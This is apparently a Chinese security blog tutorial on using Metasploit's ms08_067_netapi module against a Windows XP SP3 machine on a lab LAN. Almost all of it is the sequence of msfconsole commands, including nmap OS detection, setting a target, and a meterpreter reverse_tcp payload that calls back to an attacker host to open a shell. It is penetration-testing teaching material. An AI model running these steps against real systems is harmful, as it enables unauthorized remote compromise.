Metasploit之远程代码执行

颓废 2019年5月19日10:12:22评论444 views字数 650阅读2分10秒阅读模式

Metasploit之远程代码执行

本次漏洞利用的是ms08-067的XP漏洞

metasploit下进行操作

search 08-067            -->搜索漏洞相关的模块,得到exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi        -->使用这个漏洞模块

show options             -->查看设置选项

set RHOST 192.168.2.149  -->设置我们的攻击目标192.168.2.149

show payloads            -->查看载荷

set payload windows/meterpreter/reverse_tcp    -->使用这个载荷

show options             -->查看配置选项

set LHOST                -->设置攻击者的IP,这里我的设置:set LHOST 192.168.2.146

info                     -->查看该漏洞可以利用的针对系统,或者命令:show targets

nmap -O 192.168.2.149    -->扫描查看我们的目标主机的信息,得:Microsoft Windows XP SP3

show target id           -->知道对应的系统版本就直接设置,这里的“id”应该是对应的数字

show options             -->设置好以后的最后一遍检查

exploit                  -->执行攻击,若成功攻击即可得到meterpreter的反弹shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:12:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit之远程代码执行http://cn-sec.com/archives/67378.html

发表评论

匿名网友 填写信息